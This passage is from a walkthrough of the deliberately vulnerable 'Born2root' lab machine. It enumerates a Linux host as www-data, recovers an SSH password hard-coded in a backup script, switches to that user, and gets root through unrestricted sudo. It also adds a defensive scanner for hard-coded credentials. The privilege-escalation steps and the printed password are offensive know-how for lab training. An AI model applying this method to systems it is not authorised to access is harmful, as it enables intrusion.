Next, file capabilities. `systemd-detect-virt` carrying cap_dac_override and cap_sys_ptrace is notable, but nothing here lets us run our own code with those capabilities, so there is no direct path:

www-data@born2root:/$ getcap -r / 2>/dev/null
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/bin/ping6 = cap_net_raw+ep
/bin/ping = cap_net_raw+ep

We check whether `/etc/passwd` is writable:

www-data@born2root:/$ ls -la /etc/passwd
-rw-r--r-- 1 root root 1562 May 5 2018 /etc/passwd

`/etc/passwd` is writable only by root, so adding a user there is not an option.

The mail spool contains a mailbox for tim, readable only by tim and group `mail` (mode reconstructed from the "Permission denied" below):

www-data@born2root:/var/backups$ ls -la ../mail/
total 40
drwxrwsr-x 2 root mail 4096 May 5 2018 .
drwxr-xr-x 12 root root 4096 Apr 15 2018 ..
-rw-rw---- 1 tim mail 26430 May 5 2018 ted

We look at the home directories.

www-data@born2root:/var/backups$ ls -la /home/
total 12
drwxr-xr-x 3 root root 4096 May 5 2018 .
drwxr-xr-x 21 root root 4096 May 4 2018 ..
drwxr-xr-x 2 root root 4096 May 5 2018 tim

Neither the mailbox (not readable as `www-data`) nor tim's home directory (empty, owned by root) gives us anything:

www-data@born2root:/var/backups$ cat ../mail/ted
cat: ../mail/ted: Permission denied
www-data@born2root:/home/tim$ ls -la
total 8
drwxr-xr-x 2 root root 4096 May 5 2018 .
drwxr-xr-x 3 root root 4096 May 5 2018 ..

We look at the web root:

www-data@born2root:/home/tim$ ls -la /var/www/html/
total 316
drwxr-xr-x 9 root root 4096 May 5 2018 .
drwxr-xr-x 3 root root 4096 May 5 2018 ..
-rw-r--r-- 1 root root 0 Feb 25 2018 .htaccess
-rw-r--r-- 1 www-data www-data 1093 May 3 2018 LICENSE
-rw-r--r-- 1 www-data www-data 4344 May 3 2018 README.md
drwxr-xr-x 2 www-data www-data 4096 May 5 2018 css
drwxr-xr-x 24 www-data www-data 4096 May 5 2018 device-mockups
-rw-r--r-- 1 www-data www-data 3150 May 3 2018 gulpfile.js
drwxr-xr-x 2 www-data www-data 4096 May 5 2018 img
-rw-r--r-- 1 www-data www-data 8454 May 5 2018 index.html
drwxrwxrwx 17 www-data www-data 4096 May 5 2018 joomla
drwxr-xr-x 2 www-data www-data 4096 May 5 2018 js
-rw-r--r-- 1 www-data www-data 252190 May 3 2018 package-lock.json
-rw-r--r-- 1 www-data www-data 1226 May 3 2018 package.json
drwxr-xr-x 2 www-data www-data 4096 May 5 2018 scss
drwxr-xr-x 7 www-data www-data 4096 May 5 2018 vendor

The `joomla` directory is world-writable (drwxrwxrwx), which is why the template editor could save files, but it is owned by `www-data` anyway. Next, the system crontab:

www-data@born2root:/home/tim$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab`
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Nothing beyond the Debian defaults is scheduled there. We look at `/opt`:

www-data@born2root:/home/tim$ ls -la /opt/
total 12
drwxr-xr-x 3 root root 4096 Feb 28 2019 .
drwxr-xr-x 21 root root 4096 May 4 2018 ..
drwxrwxrwx 2 root root 4096 Feb 28 2019 scripts

`/opt/scripts` is world-writable (drwxrwxrwx) and contains a script owned by tim:

www-data@born2root:/home/tim$ ls -la /opt/scripts/
total 12
drwxrwxrwx 2 root root 4096 Feb 28 2019 .
drwxr-xr-x 3 root root 4096 Feb 28 2019 ..
-rwxr-xr-x 1 tim tim 445 Feb 28 2019 fileshare.py

A backup script, world-readable; we print it:

www-data@born2root:/home/tim$ cat /opt/scripts/fileshare.py
#!/usr/bin/env python

import sys, paramiko

if len(sys.argv) < 5:
    print "args missing"
    sys.exit(1)

hostname = "localhost"
password = "lulzlol"
source = "/var/www/html/joomla"
dest = "/tmp/backup/joomla"

username = "tim"
port = 22

try:
    t = paramiko.Transport((hostname, port))
    t.connect(username=username, password=password)
    sftp = paramiko.SFTPClient.from_transport(t)
    sftp.get(source, dest)

finally:
    t.close()

The script holds tim's SSH password in clear text (`password = "lulzlol"`): it opens an SFTP session to localhost as `tim` to copy the Joomla directory to `/tmp/backup`. Two findings in one: a hard-coded credential in a world-readable file, and a world-writable directory holding a script that presumably runs as tim (no cron entry for it is visible in `/etc/crontab`); replacing it would be code execution as tim if and when it runs. The password alone is enough here.
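Reading every script by hand does not scale; as an added example (not part of the original writeup) the following scanner looks for string literals assigned to credential-like variable names in Python, PHP, shell and JavaScript style code, run here over a constructed excerpt of the `fileshare.py` above and a couple of other assignment forms. The list of "secret" words and the assignment patterns are my assumptions, chosen to be simple rather than complete.

```python
"""Find hard-coded credentials such as the password in fileshare.py."""
import os
import re

# Identifier fragments that suggest a secret (assumed list).
SECRET_WORDS = r"pass(?:word|wd)?|pwd|secret|token|api_?key|private_?key"

# name = "value" / $name = 'value' / export NAME="value" / public $name = '...'
SECRET_RE = re.compile(
    r"^\s*(?:(?:export|const|let|var|public|private|protected)\s+)?\$?"
    r"(?P<name>\w*(?:" + SECRET_WORDS + r")\w*)"
    r"\s*[:=]\s*(?P<q>['\"])(?P<value>[^'\"]*)(?P=q)",
    re.IGNORECASE,
)


def scan_text(text, source="<text>"):
    """Return [(source, line_no, variable_name, literal_value), ...]."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = SECRET_RE.search(line)
        if m and m.group("value"):        # skip empty placeholders like ""
            findings.append((source, lineno, m.group("name"), m.group("value")))
    return findings


def scan_tree(root, max_bytes=1_000_000):
    """Scan readable text files under root; unreadable or huge files are skipped."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, encoding="utf-8", errors="ignore") as f:
                    findings.extend(scan_text(f.read(), path))
            except OSError:
                continue
    return findings


# Constructed excerpt of /opt/scripts/fileshare.py as found on the target.
SAMPLE_FILESHARE = """#!/usr/bin/env python
import sys, paramiko
hostname = "localhost"
password = "lulzlol"
username = "tim"
port = 22
"""

# Constructed examples of other assignment styles (PHP, shell, JS).
SAMPLE_OTHER = """public $password = 'dbpw';
export API_KEY="k"
name = "x"
"""

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else None
    results = scan_tree(root) if root else scan_text(SAMPLE_FILESHARE, "fileshare.py")
    for src, line, name, value in results:
        print(f"{src}:{line}: {name} = {value!r}")
```

Run as `python3 secrets.py /opt/scripts /var/www/html` on the target it reports the `password` line of `fileshare.py` and would also catch the database password in Joomla's `configuration.php`, which uses the `public $password = '...'` form.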

Privilege Escalation: tim to root

We switch to tim with the recovered password, which works:

www-data@born2root:/home/tim$ su tim
Password:
tim@born2root$

Now we check what tim may run with sudo:

tim@born2root$ sudo -l
[sudo] password for tim:
Matching Defaults entries for tim on born2root:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User tim may run the following commands on born2root:
(ALL : ALL) ALL

tim may run any command as any user via sudo (`(ALL : ALL) ALL`), so a root shell is one `sudo su` away:

tim@born2root$ sudo su
root privileges obtained!

root@born2root:/home/tim# id
uid=0(root) gid=0(root) groups=0(root)
root@born2root# ls
flag.txt

The flag:

root@born2root: cat flag.txt
.andAHHAbnn.
.aAHHHAAUUAAHHHAn.
dHP^~" "~^THb.
. .AHF YHA. .
| .AHHb. .dHHA. |
| HHAUAAHAbn adAHAAUAHA |
I HF~"_____ ____ ]HHH I
HHI HAPK""~^YUHb dAHHHHHHHHHH IHH
HHI HHHD> .andHH HHUUP^~YHHHH IHH
YUI ]HHP "~Y P~" THH[ IUP
" `HK ]HH' "
THAn. .d.aAAn.b. .dHHP
]HHHHAAUP" "YUAAHHHH[
`HHP^~" .annn. "~^YHH'
YHb ~" "" "~ dHF
"YAb..abdHHbndbndAP"
THHAAb. .adAHHF
"UHHHHHHHHHHU"
]HHUUHHHHHH[
.adHHb "HHHHHbn.
..andAAHHHHHHb.AHHHHHHHAAbnn..
.ndAAHHHHHHUUHHHHHHHHHHUP^~"~^YUHHHAAbn.
"~^YUHHP" "~^YUHHUP" "^YUP^"
"" ""


W00t w00t ! If you are reading this text then Congratulations !!

I hope you liked the second episode of 'Born2root' if you liked it please ping me in Twitter @h4d3sw0rm .

If you want to try more boxes like this created by me , try this new sweet lab called 'Wizard-Labs' which is a platform which hosts many boot2root machines to improve your pentesting skillset https://labs.wizard-security.net !
Until we meet again :-)
Privilege escalation successful; the root flag (flag.txt) is captured.